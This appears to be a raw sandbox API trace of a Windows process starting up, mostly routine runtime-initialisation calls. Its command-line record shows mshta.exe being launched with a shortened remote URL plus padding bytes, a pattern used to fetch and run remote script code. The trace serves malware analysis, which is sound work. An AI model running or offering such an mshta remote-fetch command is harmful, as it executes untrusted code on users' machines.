[0068.608] GetProcAddress (hModule=0x75f40000, lpProcName="DecodePointer") returned 0x77e59d35
[0068.608] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.608] GetProcAddress (hModule=0x75f40000, lpProcName="DecodePointer") returned 0x77e59d35
[0068.608] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.608] GetProcAddress (hModule=0x75f40000, lpProcName="DecodePointer") returned 0x77e59d35
[0068.608] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.608] GetProcAddress (hModule=0x75f40000, lpProcName="DecodePointer") returned 0x77e59d35
[0068.609] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.609] GetProcAddress (hModule=0x75f40000, lpProcName="DecodePointer") returned 0x77e59d35
[0068.609] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.609] GetProcAddress (hModule=0x75f40000, lpProcName="DecodePointer") returned 0x77e59d35
[0068.609] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.609] GetProcAddress (hModule=0x75f40000, lpProcName="DecodePointer") returned 0x77e59d35
[0068.609] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.610] GetProcAddress (hModule=0x75f40000, lpProcName="DecodePointer") returned 0x77e59d35
[0068.610] GetModuleHandleW (lpModuleName="KERNELBASE.DLL") returned 0x75f40000
[0068.610] GetProcAddress (hModule=0x75f40000, lpProcName="EncodePointer") returned 0x77e60fcb
[0068.610] GetProcAddress (hModule=0x75f40000, lpProcName="DecodePointer") returned 0x77e59d35
[0068.610] GetStartupInfoA (in: lpStartupInfo=0x33fa6c | out: lpStartupInfo=0x33fa6c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SysWOW64\\mshta.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0068.610] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
[0068.610] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
[0068.610] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
[0068.610] SetHandleCount (uNumber=0x20) returned 0x20
[0068.610] GetCommandLineA () returned="C:\\Windows\\SysWOW64\\mshta.exe https://urlz.fr/8gYe &AAAAAAAAAAAAAAAA\x12\x0cC"
[0068.610] GetEnvironmentStringsW () returned 0x830388*
[0068.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1471, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1471
[0068.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1471, lpMultiByteStr=0x170e78, cbMultiByte=1471, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1471
[0068.611] FreeEnvironmentStringsW (penv=0x830388) returned 1
[0068.611] GetLastError () returned 0x0
[0068.611] SetLastError (dwErrCode=0x0)
[0068.611] GetLastError () returned 0x0
[0068.611] SetLastError (dwErrCode=0x0)
[0068.611] GetLastError () returned 0x0
[0068.611] SetLastError (dwErrCode=0x0)
[0068.611] GetACP () returned 0x4e4
[0068.611] GetLastError () returned 0x0
[0068.611] SetLastError (dwErrCode=0x0)
[0068.611] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x33fa44 | out: lpCPInfo=0x33fa44) returned 1
[0068.611] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x33f510 | out: lpCPInfo=0x33f510) returned 1
[0068.611] GetLastError () returned 0x0
[0068.611] SetLastError (dwErrCode=0x0)
[0068.611] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x33f4a0 | out: lpCharType=0x33f4a0) returned 1
[0068.611] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f924, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
[0068.611] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f924, cbMultiByte=256, lpWideCharStr=0x33f288, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
[0068.611] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x33f524 | out: lpCharType=0x33f524) returned 1
[0068.611] GetLastError () returned 0x0
[0068.612] SetLastError (dwErrCode=0x0)
[0068.612] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1
[0068.612] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f924, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
[0068.612] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f924, cbMultiByte=256, lpWideCharStr=0x33f228, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㗘퇗溂h퉨㜀Ā") returned 256
[0068.612] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㗘퇗溂h퉨㜀Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256
[0068.612] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㗘퇗溂h퉨㜀Ā", cchSrc=256, lpDestStr=0x33f018, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256
[0068.612] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x33f824, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x3c\xdc", lpUsedDefaultChar=0x0) returned 256
[0068.612] GetLastError () returned 0x0
[0068.612] SetLastError (dwErrCode=0x0)
[0068.612] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f924, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
[0068.612] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x33f924, cbMultiByte=256, lpWideCharStr=0x33f248, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㗘퇗溂h튈㜀Ā") returned 256
[0068.612] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㗘퇗溂h튈㜀Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256
[0068.612] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㗘퇗溂h튈㜀Ā", cchSrc=256, lpDestStr=0x33f038, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256
[0068.612] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x33f724, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x3c\xdc", lpUsedDefaultChar=0x0) returned 256
[0068.612] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x68b0f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d
[0068.612] GetLastError () returned 0x0
[0068.612] SetLastError (dwErrCode=0x0)
[0068.612] GetLastError () returned 0x0
[0068.612] SetLastError (dwErrCode=0x0)
[0068.612] GetLastError () returned 0x0
[0068.612] SetLastError (dwErrCode=0x0)
[0068.613] GetLastError () returned 0x0
[0068.613] SetLastError (dwErrCode=0x0)
[0068.613] GetLastError () returned 0x0
[0068.613] SetLastError (dwErrCode=0x0)
[0068.613] GetLastError () returned 0x0
[0068.613] SetLastError (dwErrCode=0x0)
[0068.613] GetLastError () returned 0x0
[0068.613] SetLastError (dwErrCode=0x0)
[0068.613] GetLastError () returned 0x0
[0068.613] SetLastError (dwErrCode=0x0)
[0068.613] GetLastError () returned 0x0
[0068.613] SetLastError (dwErrCode=0x0)
[0068.613] GetLastError () returned 0x0
[0068.613] SetLastError (dwErrCode=0x0)
[0068.613] GetLastError () returned 0x0
[0068.613] SetLastError (dwErrCode=0x0)
[0068.613] GetLastError () returned 0x0
[0068.613] SetLastError (dwErrCode=0x0)
[0068.614] GetLastError () returned 0x0
[0068.614] SetLastError (dwErrCode=0x0)
[0068.614] GetLastError () returned 0x0
[0068.614] SetLastError (dwErrCode=0x0)
[0068.614] GetLastError () returned 0x0
[0068.614] SetLastError (dwErrCode=0x0)
[0068.614] GetLastError () returned 0x0
[0068.614] SetLastError (dwErrCode=0x0)
[0068.614] GetLastError () returned 0x0
[0068.614] SetLastError (dwErrCode=0x0)
[0068.614] GetLastError () returned 0x0
[0068.614] SetLastError (dwErrCode=0x0)
[0068.614] GetLastError () returned 0x0
[0068.614] SetLastError (dwErrCode=0x0)
[0068.614] GetLastError () returned 0x0
[0068.614] SetLastError (dwErrCode=0x0)
[0068.614] GetLastError () returned 0x0
[0068.614] SetLastError (dwErrCode=0x0)
[0068.614] GetLastError () returned 0x0
[0068.615] SetLastError (dwErrCode=0x0)
[0068.615] GetLastError () returned 0x0
[0068.615] SetLastError (dwErrCode=0x0)
[0068.615] GetLastError () returned 0x0
[0068.615] SetLastError (dwErrCode=0x0)
[0068.615] GetLastError () returned 0x0
[0068.615] SetLastError (dwErrCode=0x0)
[0068.615] GetLastError () returned 0x0
[0068.615] SetLastError (dwErrCode=0x0)
[0068.615] GetLastError () returned 0x0
[0068.615] SetLastError (dwErrCode=0x0)
[0068.615] GetLastError () returned 0x0
[0068.615] SetLastError (dwErrCode=0x0)
[0068.615] GetLastError () returned 0x0
[0068.615] SetLastError (dwErrCode=0x0)
[0068.615] GetLastError () returned 0x0
[0068.615] SetLastError (dwErrCode=0x0)
[0068.615] GetLastError () returned 0x0
[0068.616] SetLastError (dwErrCode=0x0)
[0068.616] GetLastError () returned 0x0
[0068.616] SetLastError (dwErrCode=0x0)
[0068.616] GetLastError () returned 0x0
[0068.616] SetLastError (dwErrCode=0x0)
[0068.616] GetLastError () returned 0x0
[0068.616] SetLastError (dwErrCode=0x0)
[0068.616] GetLastError () returned 0x0
[0068.616] SetLastError (dwErrCode=0x0)
[0068.616] GetLastError () returned 0x0
[0068.616] SetLastError (dwErrCode=0x0)
[0068.616] GetLastError () returned 0x0
[0068.616] SetLastError (dwErrCode=0x0)
[0068.616] GetLastError () returned 0x0
[0068.616] SetLastError (dwErrCode=0x0)
[0068.616] GetLastError () returned 0x0
[0068.616] SetLastError (dwErrCode=0x0)
[0068.616] GetLastError () returned 0x0
